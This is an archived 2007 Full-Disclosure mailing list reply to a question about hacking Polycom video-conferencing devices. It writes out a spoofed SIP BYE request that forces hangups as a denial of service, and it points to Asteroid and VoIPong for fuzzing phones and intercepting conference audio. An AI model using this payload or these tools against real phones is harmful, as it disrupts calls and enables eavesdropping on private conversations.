lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 26 Jun 2007 14:15:51 -0400
From: "J. Oquendo" <sil@...iltrated.net>
To: Paul Schmehl <pauls@...allas.edu>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Polycom hacking

Paul Schmehl wrote:
> Is anyone aware of any work done in the field of hacking Polycom 
> video-conferencing devices?  Or any known hacks for Polycom devices?
>
Hey Paul,

I have a modified version of Asteroid lying on one of my
servers that affected Polycoms, Snoms, Hitachi WiFi's,
and possibly a few others.

Offhand you could with high probability generate a hangup
DoS if you know enough about the network topology. E.g.:

   BYE sip:victim.phone.com SIP/2.0
   Via: SIP/2.0/TCP spoofed.pbx.server.com:5060
   Max-Forwards: 70
   From: Spoofed <sip:spoofed.pbx.server.com>
   To: VICTIM <sip:victim@...tim.phone.com>
   Call-ID: $GENERATE_CID_NUMBER@...tim.phone.com
   CSeq: 1 BYE
   Content-Length: 0

You could take a look at Asteroid and target a Polycom
with it. I haven't bothered much with them. Cisco's
aren't vuln to much I've thrown at them yet.
(greetings Dario@^C*).

As for video (H323) check out voippong: You may be able
to intercept the audio streams out of the conference
depending on the setup. (Asterisk doesn't do H323)...
Maybe a combination of Yates, VoIPPong and others. HTH

http://www.enderunix.org/voipong/
http://www.infiltrated.net/asteroid/
http://www.voipsa.org/Resources/tools.php


-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 

"Wise men talk because they have something to say;
fools, because they have to say something." -- Plato



Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5157 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ